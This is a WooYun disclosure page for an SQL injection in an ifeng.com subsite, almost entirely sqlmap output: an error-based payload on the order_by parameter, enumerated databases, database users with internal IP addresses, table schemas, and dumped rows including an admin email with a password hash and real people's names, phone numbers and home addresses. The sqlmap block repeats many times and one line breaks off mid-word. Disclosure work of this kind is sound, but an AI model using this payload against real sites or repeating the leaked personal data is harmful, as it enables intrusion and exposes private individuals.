凤凰网分站SQL注入漏洞（root权限） | wooyun-2014-059433| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-059433

漏洞标题：凤凰网分站SQL注入漏洞（root权限）

漏洞作者： Hxai11

提交时间：2014-05-05 12:49

修复时间：2014-06-19 12:50

公开时间：2014-06-19 12:50

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：10

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-05-05：细节已通知厂商并且等待厂商处理中
2014-05-05：厂商已经确认，细节仅向厂商公开
2014-05-15：细节向核心白帽子及相关领域专家公开
2014-05-25：细节向普通白帽子公开
2014-06-04：细节向实习白帽子公开
2014-06-19：细节向公众公开
简要描述：

sql注入怪物来了
详细说明：

注入地址：http://app.bbs.ifeng.com/dkjs/data.php?callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined&order_by=undefined
单引号回车后报错，爆路径，于是丢到sqlmap中跑
之后就什么都有了
首先是数据库列表
之后查看是否是dba
之后查看用户列表
完完全全的暴露了内网的ip和其他数据库地址
剩下的看代码吧
sqlmap identified the following injection points with a total of 1624 HTTP(s) requests:
---
Place: GET
Parameter: order_by
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined&order_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&order_type=undefined
---
available databases [11]:
[*] app_bbs
[*] app_news
[*] app_weather
[*] apphistory_news
[*] appmil_news
[*] appsports_news
[*] baike_health
[*] baike_house
[*] information_schema
[*] mysql
[*] test
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: order_by
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined&order_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&order_type=undefined
---
database management system users [234]:
[*] ''@'localhost'
[*] 'B74wNuTbbx'@'10.11.2.89'
[*] 'B74wNuTbbx'@'10.11.2.90'
[*] 'B74wNuTbbx'@'10.13.2.134'
[*] 'B74wNuTbbx'@'10.13.2.135'
[*] 'B74wNuTbbx'@'10.13.2.176'
[*] 'B74wNuTbbx'@'10.13.2.177'
[*] 'B74wNuTbbx'@'220.181.67.192'
[*] 'iadmin'@'211.151.61.77'
[*] 'root'@'10.13.2.132'
[*] 'root'@'10.13.2.134'
[*] 'root'@'10.13.2.135'
[*] 'root'@'10.13.2.176'
[*] 'root'@'10.13.2.177'
[*] 'root'@'127.0.0.1'
[*] 'root'@'192.168.2.162'
[*] 'root'@'192.168.2.167'
[*] 'root'@'220.181.24.100'
[*] 'root'@'220.181.24.166'
[*] 'root'@'220.181.24.2'
[*] 'root'@'220.181.67.192'
[*] 'root'@'localhost'
[*] 'zabbix'@'127.0.0.1'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: order_by
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined&order_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&order_type=undefined
---
available databases [11]:
[*] app_bbs
[*] app_news
[*] app_weather
[*] apphistory_news
[*] appmil_news
[*] appsports_news
[*] baike_health
[*] baike_house
[*] information_schema
[*] mysql
[*] test
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: order_by
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined&order_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&order_type=undefined
---
Database: app_bbs
[1 table]
+------+
| dkjs |
+------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: order_by
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined&order_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&order_type=undefined
---
Database: baike_house
[32 tables]
+-----------------------+
| wiki_activation       |
| wiki_advertisement    |
| wiki_attachment       |
| wiki_autosave         |
| wiki_banned           |
| wiki_blacklist        |
| wiki_category         |
| wiki_channel          |
| wiki_comment          |
| wiki_creditdetail     |
| wiki_doc              |
| wiki_docreference     |
| wiki_edition          |
| wiki_focus            |
| wiki_friendlink       |
| wiki_language         |
| wiki_lock             |
| wiki_plugin           |
| wiki_pluginhook       |
| wiki_pluginvar        |
| wiki_pms              |
| wiki_regular          |
| wiki_regular_relation |
| wiki_regulargroup     |
| wiki_session          |
| wiki_setting          |
| wiki_style            |
| wiki_synonym          |
| wiki_task             |
| wiki_user             |
| wiki_usergroup        |
| wiki_word             |
+-----------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: order_by
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined&order_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&order_type=undefined
---
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: order_by
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined&order_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&order_type=undefined
---
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: order_by
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined&order_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATsqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: order_by
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined&order_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&order_type=undefined
---
available databases [11]:
[*] app_bbs
[*] app_news
[*] app_weather
[*] apphistory_news
[*] appmil_news
[*] appsports_news
[*] baike_health
[*] baike_house
[*] information_schema
[*] mysql
[*] test
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: order_by
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined&order_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&order_type=undefined
---
Database: baike_house
Table: wiki_user
[22 columns]
+------------+-----------------------+
| Column     | Type                  |
+------------+-----------------------+
| birthday   | int(10) unsigned      |
| checkup    | int(10) unsigned      |
| creates    | mediumint(8) unsigned |
| credits    | int(10)               |
| edits      | mediumint(8) unsigned |
| email      | char(50)              |
| gender     | tinyint(1)            |
| groupid    | smallint(6) unsigned  |
| image      | varchar(255)          |
| language   | varchar(20)           |
| lastip     | char(15)              |
| lasttime   | int(10) unsigned      |
| location   | varchar(30)           |
| password   | char(32)              |
| regip      | char(15)              |
| regtime    | int(10) unsigned      |
| signature  | text                  |
| style      | varchar(20)           |
| timeoffset | varchar(20)           |
| uid        | mediumint(8) unsigned |
| username   | char(15)              |
| views      | int(10) unsigned      |
+------------+-----------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: order_by
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined&order_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&order_type=undefined
---
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: order_by
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined&order_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&order_type=undefined
---
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: order_by
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined&order_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&order_type=undefined
---
Database: baike_house
Table: wiki_user
[10 entries]
+-----+---------+---------+---------+-------+-------+---------+-----------------+--------+----------------+---------+------------+---------+---------+------------+----------+-----------------+----------+----------------------------------+----------+-----------+------------+
| uid | groupid | image   | style   | edits | views | regip   | email           | gender | lastip         | checkup | regtime    | credits | creates | lasttime   | location | username        | birthday | password                         | language | signature | timeoffset |
+-----+---------+---------+---------+-------+-------+---------+-----------------+--------+----------------+---------+------------+---------+---------+------------+----------+-----------------+----------+----------------------------------+----------+-----------+------------+
| 1   | 4       | <blank> | default | 0     | 59    | <blank> | wuwei@ifeng.com | 0      | 220.181.24.2   | 1       | 1270174931 | 21      | 0       | 1270174967 | <blank>  | house_admin     | 0        | e10adc3949ba59abbe56e057f20f883e | zh       | <blank>   | 8          |
| 2   | 4       | <blank> | default | 2     | 171   | <blank> | <blank>         | 0      | 220.181.67.192 | 1       | 0          | 41      | 1       | 1286971633 | <blank>  | 冠缨豺郎            | 0        | <blank>                          | zh       | <blank>   | 8          |
| 3   | 2       | <blank> | default | 0     | 29    | <blank> | <blank>         | 0      | <blank>        | 1       | 0          | 20      | 0       | 0          | <blank>  | zhaoxiaoxiong   | 0        | <blank>                          | zh       | <blank>   | 8          |
| 4   | 4       | <blank> | default | 44    | 825   | <blank> | <blank>         | 0      | 220.181.67.192 | 1       | 0          | 264     | 23      | 1287390647 | <blank>  | 漫巴              | 0        | <blank>                          | zh       | <blank>   | 8          |
| 5   | 8       | <blank> | default | 7     | 1140  | <blank> | <blank>         | 0      | 220.181.24.2   | 1       | 0          | 663     | 124     | 1270429517 | <blank>  | 西瓜妹             | 0        | <blank>                          | zh       | <blank>   | 8          |
| 6   | 2       | <blank> | default | 0     | 29    | <blank> | <blank>         | 0      | <blank>        | 1       | 0          | 20      | 0       | 0          | <blank>  | zhuantou        | 0        | <blank>                          | zh       | <blank>   | 8          |
| 7   | 2       | <blank> | default | 0     | 30    | <blank> | <blank>         | 0      | <blank>        | 1       | 0          | 20      | 0       | 0          | <blank>  | c100            | 0        | <blank>                          | zh       | <blank>   | 8          |
| 8   | 8       | <blank> | default | 7     | 1183  | <blank> | <blank>         | 0      | 220.181.24.2   | 1       | 0          | 794     | 150     | 1270959387 | <blank>  | 金鱼77            | 0        | <blank>                          | zh       | <blank>   | 8          |
| 9   | 2       | <blank> | default | 0     | 31    | <blank> | <blank>         | 0      | <blank>        | 1       | 0          | 20      | 0       | 0          | <blank>  | qq15236958@sina | 0        | <blank>                          | zh       | <blank>   | 8          |
| 10  | 7       | <blank> | default | 0     | 793   | <blank> | <blank>         | 0      | 220.181.24.2   | 1       | 0          | 533     | 102     | 1270545218 | <blank>  | qq15236958      | 0        | <blank>                          | zh       | <blank>   | 8          |
+-----+---------+---------+---------+-------+-------+---------+-----------------+--------+----------------+---------+------------+---------+---------+------------+----------+-----------------+----------+----------------------------------+----------+-----------+------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: order_by
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined&order_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&order_type=undefined
---
Database: baike_house
Table: wiki_user
[11 entries]
+-----+---------+---------+---------+-------+-------+---------+---------+--------+---------+---------+---------+---------+---------+----------+----------+--------------+----------+----------+----------+-----------+------------+
| uid | groupid | image   | style   | edits | views | regip   | email   | gender | lastip  | checkup | regtime | credits | creates | lasttime | location | username     | birthday | password | language | signature | timeoffset |
+-----+---------+---------+---------+-------+-------+---------+---------+--------+---------+---------+---------+---------+---------+----------+----------+--------------+----------+----------+----------+-----------+------------+
| 100 | 2       | <blank> | default | 0     | 6     | <blank> | <blank> | 0      | <blank> | 1       | 0       | 20      | 0       | 0        | <blank>  | yangganghong | 0        | <blank>  | zh       | <blank>   | 8          |
| 101 | 2       | <blank> | default | 0     | 6     | <blank> | <blank> | 0      | <blank> | 1       | 0       | 20      | 0       | 0        | <blank>  | 肖张氏          | 0        | <blank>  | zh       | <blank>   | 8          |
| 102 | 2       | <blank> | default | 0     | 6     | <blank> | <blank> | 0      | <blank> | 1       | 0       | 20      | 0       | 0        | <blank>  | hanruikai    | 0        | <blank>  | zh       | <blank>   | 8          |
| 103 | 2       | <blank> | default | 0     | 7     | <blank> | <blank> | 0      | <blank> | 1       | 0       | 20      | 0       | 0        | <blank>  | cbgwllcjt    | 0        | <blank>  | zh       | <blank>   | 8          |
| 104 | 2       | <blank> | default | 0     | 4     | <blank> | <blank> | 0      | <blank> | 1       | 0       | 20      | 0       | 0        | <blank>  | gk777        | 0        | <blank>  | zh       | <blank>   | 8          |
| 105 | 2       | <blank> | default | 0     | 4     | <blank> | <blank> | 0      | <blank> | 1       | 0       | 20      | 0       | 0        | <blank>  | 品酸           | 0        | <blank>  | zh       | <blank>   | 8          |
| 106 | 2       | <blank> | default | 0     | 3     | <blank> | <blank> | 0      | <blank> | 1       | 0       | 20      | 0       | 0        | <blank>  | daiyb        | 0        | <blank>  | zh       | <blank>   | 8          |
| 107 | 2       | <blank> | default | 0     | 6     | <blank> | <blank> | 0      | <blank> | 1       | 0       | 20      | 0       | 0        | <blank>  | 欧阳君山         | 0        | <blank>  | zh       | <blank>   | 8          |
| 108 | 2       | <blank> | default | 0     | 3     | <blank> | <blank> | 0      | <blank> | 1       | 0       | 20      | 0       | 0        | <blank>  | 小马不识途        | 0        | <blank>  | zh       | <blank>   | 8          |
| 109 | 2       | <blank> | default | 0     | 6     | <blank> | <blank> | 0      | <blank> | 1       | 0       | 20      | 0       | 0        | <blank>  | gxy891029    | 0        | <blank>  | zh       | <blank>   | 8          |
| 110 | 2       | <blank> | default | 0     | 6     | <blank> | <blank> | 0      | <blank> | 1       | 0       | 20      | 0       | 0        | <blank>  | 晓飞416329     | 0        | <blank>  | zh       | <blank>   | 8          |
+-----+---------+---------+---------+-------+-------+---------+---------+--------+---------+---------+---------+---------+---------+----------+----------+--------------+----------+----------+----------+-----------+------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: order_by
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined&order_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&order_type=undefined
---
available databases [11]:
[*] app_bbs
[*] app_news
[*] app_weather
[*] apphistory_news
[*] appmil_news
[*] appsports_news
[*] baike_health
[*] baike_house
[*] information_schema
[*] mysql
[*] test
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: order_by
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined&order_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&order_type=undefined
---
Database: baike_health
[35 tables]
+------------------------+
| wiki_activation        |
| wiki_advertisement     |
| wiki_attachment        |
| wiki_autosave          |
| wiki_banned            |
| wiki_blacklist         |
| wiki_category          |
| wiki_category_20100224 |
| wiki_channel           |
| wiki_comment           |
| wiki_creditdetail      |
| wiki_doc               |
| wiki_doc_20100224_20   |
| wiki_doc_temp_copy     |
| wiki_docreference      |
| wiki_edition           |
| wiki_focus             |
| wiki_friendlink        |
| wiki_language          |
| wiki_lock              |
| wiki_plugin            |
| wiki_pluginhook        |
| wiki_pluginvar         |
| wiki_pms               |
| wiki_regular           |
| wiki_regular_relation  |
| wiki_regulargroup      |
| wiki_session           |
| wiki_setting           |
| wiki_style             |
| wiki_synonym           |
| wiki_task              |
| wiki_user              |
| wiki_usergroup         |
| wiki_word              |
+------------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: order_by
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined&order_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&order_type=undefined
---
Database: baike_health
Table: wiki_user
[11 entries]
+-----+---------+---------+---------+-------+-------+---------+---------+--------+----------------+---------+---------+---------+---------+------------+----------+----------------+----------+----------+----------+-----------+------------+
| uid | groupid | image   | style   | edits | views | regip   | email   | gender | lastip         | checkup | regtime | credits | creates | lasttime   | location | username       | birthday | password | language | signature | timeoffset |
+-----+---------+---------+---------+-------+-------+---------+---------+--------+----------------+---------+---------+---------+---------+------------+----------+----------------+----------+----------+----------+-----------+------------+
| 100 | 2       | <blank> | default | 0     | 0     | <blank> | <blank> | 0      | <blank>        | 1       | 0       | 20      | 0       | 0          | <blank>  | 新娘jiujiu       | 0        | <blank>  | zh       | <blank>   | 8          |
| 101 | 2       | <blank> | default | 0     | 0     | <blank> | <blank> | 0      | <blank>        | 1       | 0       | 20      | 0       | 0          | <blank>  | 江湖一鸣           | 0        | <blank>  | zh       | <blank>   | 8          |
| 102 | 2       | <blank> | default | 0     | 40    | <blank> | <blank> | 0      | 59.175.185.178 | 1       | 0       | 21      | 0       | 1267751010 | <blank>  | erxy           | 0        | <blank>  | zh       | <blank>   | 8          |
| 103 | 2       | <blank> | default | 0     | 0     | <blank> | <blank> | 0      | <blank>        | 1       | 0       | 20      | 0       | 0          | <blank>  | fuf            | 0        | <blank>  | zh       | <blank>   | 8          |
| 104 | 2       | <blank> | default | 0     | 0     | <blank> | <blank> | 0      | <blank>        | 1       | 0       | 20      | 0       | 0          | <blank>  | 墨侃             | 0        | <blank>  | zh       | <blank>   | 8          |
| 105 | 2       | <blank> | default | 0     | 0     | <blank> | <blank> | 0      | <blank>        | 1       | 0       | 20      | 0       | 0          | <blank>  | maiky1987      | 0        | <blank>  | zh       | <blank>   | 8          |
| 106 | 2       | <blank> | default | 0     | 0     | <blank> | <blank> | 0      | <blank>        | 1       | 0       | 20      | 0       | 0          | <blank>  | yantachenzhong | 0        | <blank>  | zh       | <blank>   | 8          |
| 107 | 2       | <blank> | default | 0     | 0     | <blank> | <blank> | 0      | <blank>        | 1       | 0       | 20      | 0       | 0          | <blank>  | chen0928       | 0        | <blank>  | zh       | <blank>   | 8          |
| 108 | 2       | <blank> | default | 0     | 0     | <blank> | <blank> | 0      | <blank>        | 1       | 0       | 20      | 0       | 0          | <blank>  | 高老庄0560        | 0        | <blank>  | zh       | <blank>   | 8          |
| 109 | 2       | <blank> | default | 0     | 0     | <blank> | <blank> | 0      | <blank>        | 1       | 0       | 20      | 0       | 0          | <blank>  | 为了国家的80后       | 0        | <blank>  | zh       | <blank>   | 8          |
| 110 | 2       | <blank> | default | 0     | 0     | <blank> | <blank> | 0      | <blank>        | 1       | 0       | 20      | 0       | 0          | <blank>  | bxbglg123      | 0        | <blank>  | zh       | <blank>   | 8          |
+-----+---------+---------+---------+-------+-------+---------+---------+--------+----------------+---------+---------+---------+---------+------------+----------+----------------+----------+----------+----------+-----------+------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: order_by
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined&order_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&order_type=undefined
---
available databases [11]:
[*] app_bbs
[*] app_news
[*] app_weather
[*] apphistory_news
[*] appmil_news
[*] appsports_news
[*] baike_health
[*] baike_house
[*] information_schema
[*] mysql
[*] test
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: order_by
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined&order_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&order_type=undefined
---
Database: app_bbs
[1 table]
+------+
| dkjs |
+------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: order_by
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined&order_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&order_type=undefined
---
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: order_by
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined&order_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&order_type=undefined
---
Database: app_bbs
Table: dkjs
[3 entries]
+-----+---------+------+-------------------+-------------+--------------+--------+--------+--------+--------+--------+-----------------+----------+---------------------+
| id  | city    | name | story             | phone       | school       | is_wap | photo3 | verify | photo2 | photo1 | address         | province | submit_time         |
+-----+---------+------+-------------------+-------------+--------------+--------+--------+--------+--------+--------+-----------------+----------+---------------------+
| 122 | 南阳      | 李果   | 失业，多次评为优秀教师，模范班主任 | 13037606030 | 河南邓州市穰东镇葛营小学 | 0      | 4      | yes    | 4      | 4      | 河南省邓州市穰东镇前庄村轩寺组 | 河南       | 2010-02-05 16:08:03 |
| 123 | <blank> | 晓清   |                   | 13017329166 | 某学校          | 0      | 4      | yes    | 4      | 4      | 湖南              | 湖南       | 2010-02-05 16:14:31 |
| 124 | 梧州      | 郭伟民  |                   | 13878431590 | 岑溪市樟木镇思孟联办中学 | 0      | 4      | yes    | 4      | 4      | 岑溪市城中路20号       | 广西       | 2010-02-05 16:14:38 |
+-----+---------+------+-------------------+-------------+--------------+--------+--------+--------+--------+--------+-----------------+----------+---------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: order_by
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined&order_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&order_type=undefined
---
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: order_by
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined&order_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&order_type=undefined
---
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: order_by
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined&order_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&order_type=undefined
---
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: order_by
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
